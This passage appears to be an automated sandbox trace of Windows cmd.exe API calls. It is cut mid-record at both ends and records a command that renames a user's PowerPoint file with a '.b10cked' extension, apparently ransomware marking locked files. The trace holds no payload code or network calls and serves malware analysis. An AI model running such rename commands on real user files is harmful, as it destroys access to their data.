AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.821] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af7c4, dwLength=0x1c | out: lpBuffer=0x2af7c4*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.821] GetConsoleOutputCP () returned 0x1b5 [0235.821] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.821] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.821] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.821] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.821] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.821] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.822] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.822] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.822] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.822] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.822] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.822] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.822] GetEnvironmentStringsW () returned 0x470168* [0235.822] FreeEnvironmentStringsW (penv=0x470168) returned 1 [0235.822] GetEnvironmentStringsW () returned 0x470168* [0235.823] FreeEnvironmentStringsW (penv=0x470168) returned 1 [0235.823] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae764 | out: phkResult=0x2ae764*=0x40) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x0, lpData=0x2ae770*=0x90, lpcbData=0x2ae768*=0x1000) returned 0x2 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x1, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x0, lpData=0x2ae770*=0x1, lpcbData=0x2ae768*=0x1000) returned 0x2 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x0, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x40, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x40, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x0, lpData=0x2ae770*=0x40, lpcbData=0x2ae768*=0x1000) returned 0x2 [0235.823] RegCloseKey (hKey=0x40) returned 0x0 [0235.823] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae764 | out: phkResult=0x2ae764*=0x40) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x0, lpData=0x2ae770*=0x40, lpcbData=0x2ae768*=0x1000) returned 0x2 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x1, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x0, lpData=0x2ae770*=0x1, lpcbData=0x2ae768*=0x1000) returned 0x2 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x0, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x9, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x9, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x0, lpData=0x2ae770*=0x9, lpcbData=0x2ae768*=0x1000) returned 0x2 [0235.823] RegCloseKey (hKey=0x40) returned 0x0 [0235.823] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c3 [0235.823] srand (_Seed=0x5b8863c3) [0235.823] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked\"" [0235.823] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked\"" [0235.823] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.824] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4718c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.824] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.824] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.824] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.824] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.824] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.824] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.824] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.824] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.824] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.824] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.824] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.824] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.824] GetEnvironmentStringsW () returned 0x4722b8* [0235.824] FreeEnvironmentStringsW (penv=0x4722b8) returned 1 [0235.824] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.824] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.824] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.824] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.824] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.824] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.824] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.824] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.825] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.825] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.825] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af530 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.825] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af530, lpFilePart=0x2af52c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af52c*="Desktop") returned 0x18 [0235.825] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.825] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af2ac | out: lpFindFileData=0x2af2ac) returned 0x46fff8 [0235.825] FindClose (in: hFindFile=0x46fff8 | out: hFindFile=0x46fff8) returned 1 [0235.825] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af2ac | out: lpFindFileData=0x2af2ac) returned 0x46fff8 [0235.825] FindClose (in: hFindFile=0x46fff8 | out: hFindFile=0x46fff8) returned 1 [0235.825] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af2ac | out: lpFindFileData=0x2af2ac) returned 0x46fff8 [0235.825] FindClose (in: hFindFile=0x46fff8 | out: hFindFile=0x46fff8) returned 1 [0235.825] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.825] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.825] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.825] GetEnvironmentStringsW () returned 0x472ad8* [0235.826] FreeEnvironmentStringsW (penv=0x472ad8) returned 1 [0235.826] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.826] GetConsoleOutputCP () returned 0x1b5 [0235.826] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.826] GetUserDefaultLCID () returned 0x409 [0235.826] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af670, cchData=128 | out: lpLCData="0") returned 2 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af670, cchData=128 | out: lpLCData="0") returned 2 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af670, cchData=128 | out: lpLCData="1") returned 2 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.827] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.828] GetConsoleTitleW (in: lpConsoleTitle=0x4608d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.828] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.828] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.828] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.828] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.829] _wcsicmp (_String1="move", _String2=")") returned 68 [0235.829] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0235.829] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0235.829] _wcsicmp (_String1="IF", _String2="move") returned -4 [0235.829] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0235.829] _wcsicmp (_String1="REM", _String2="move") returned 5 [0235.829] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0235.831] GetConsoleTitleW (in: lpConsoleTitle=0x2af368, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.831] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0235.831] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0235.831] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0235.831] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0235.831] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0235.831] _wcsicmp (_String1="move", _String2="CD") returned 10 [0235.832] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0235.832] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0235.832] _wcsicmp (_String1="move", _String2="REN") returned -5 [0235.832] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0235.832] _wcsicmp (_String1="move", _String2="SET") returned -6 [0235.832] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0235.832] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0235.832] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0235.832] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0235.832] _wcsicmp (_String1="move", _String2="MD") returned 11 [0235.832] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0235.832] _wcsicmp (_String1="move", _String2="RD") returned -5 [0235.832] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0235.832] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0235.832] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0235.832] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0235.832] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0235.832] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0235.832] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0235.832] _wcsicmp (_String1="move", _String2="VER") returned -9 [0235.832] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0235.832] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0235.832] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0235.832] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0235.832] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0235.832] _wcsicmp (_String1="move", _String2="START") returned -6 [0235.832] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0235.832] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0235.832] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0235.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.833] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af124, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af11c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af11c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0235.835] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0235.835] _wcsicmp (_String1="FUT5WR~1.PPT", _String2=".") returned 56 [0235.835] _wcsicmp (_String1="FUT5WR~1.PPT", _String2="..") returned 56 [0235.835] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\fut5wr~1.ppt")) returned 0x20 [0235.835] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x471d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.835] SetErrorMode (uMode=0x0) returned 0x0 [0235.835] SetErrorMode (uMode=0x1) returned 0x0 [0235.836] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT", nBufferLength=0x104, lpBuffer=0x2aeaac, lpFilePart=0x2aea94 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT", lpFilePart=0x2aea94*="FUT5WR~1.PPT") returned 0x26 [0235.836] SetErrorMode (uMode=0x0) returned 0x1 [0235.836] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0235.836] _wcsicmp (_String1="FUT5WR~1.PPT", _String2=".") returned 56 [0235.836] _wcsicmp (_String1="FUT5WR~1.PPT", _String2="..") returned 56 [0235.836] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\fut5wr~1.ppt")) returned 0x20 [0235.836] SetErrorMode (uMode=0x0) returned 0x0 [0235.836] SetErrorMode (uMode=0x1) returned 0x0 [0235.836] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT", nBufferLength=0x104, lpBuffer=0x2aef28, lpFilePart=0x2aecc0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT", lpFilePart=0x2aecc0*="FUT5WR~1.PPT") returned 0x26 [0235.836] SetErrorMode (uMode=0x0) returned 0x1 [0235.836] SetErrorMode (uMode=0x0) returned 0x0 [0235.836] SetErrorMode (uMode=0x1) returned 0x0 [0235.836] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x2af130, lpFilePart=0x2aecc0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked", lpFilePart=0x2aecc0*="fUt5wrAPeTu.pptx.b10cked") returned 0x32 [0235.836] SetErrorMode (uMode=0x0) returned 0x1 [0235.836] SetLastError (dwErrCode=0x0) [0235.836] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fut5wrapetu.pptx.b10cked")) returned 0xffffffff [0235.836] GetLastError () returned 0x2 [0235.836] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x2ae63c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae63c) returned 0x460f08 [0235.836] FindNextFileW (in: hFindFile=0x460f08, lpFindFileData=0x2ae63c | out: lpFindFileData=0x2ae63c) returned 0 [0235.837] GetLastError () returned 0x12 [0235.837] FindClose (in: hFindFile=0x460f08 | out: hFindFile=0x460f08) returned 1 [0235.838] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x471ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x471ae0) returned 0x460f08 [0235.838] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x2ae8d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked", lpFilePart=0x0) returned 0x32 [0235.838] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx", nBufferLength=0x104, lpBuffer=0x2ae8d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx", lpFilePart=0x0) returned 0x2a [0235.838] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\fut5wrapetu.pptx")) returned 0x20 [0235.838] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\fut5wrapetu.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fut5wrapetu.pptx.b10cked"), dwFlags=0x3) returned 1 [0235.839] FindClose (in: hFindFile=0x460f08 | out: hFindFile=0x460f08) returned 1 [0235.839] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ae888 | out: _Buffer=" 1") returned 9 [0235.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.839] GetFileType (hFile=0x7) returned 0x2 [0235.928] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.928] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ae814 | out: lpMode=0x2ae814) returned 1 [0235.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.928] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ae848 | out: lpConsoleScreenBufferInfo=0x2ae848) returned 1 [0235.929] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.929] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x2ae888 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.929] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ae86c, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x2ae86c*=0x1a) returned 1 [0235.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.929] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.930] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.930] SetConsoleInputExeNameW () returned 0x1 [0235.930] GetConsoleOutputCP () returned 0x1b5 [0235.930] GetCPInfo (in: 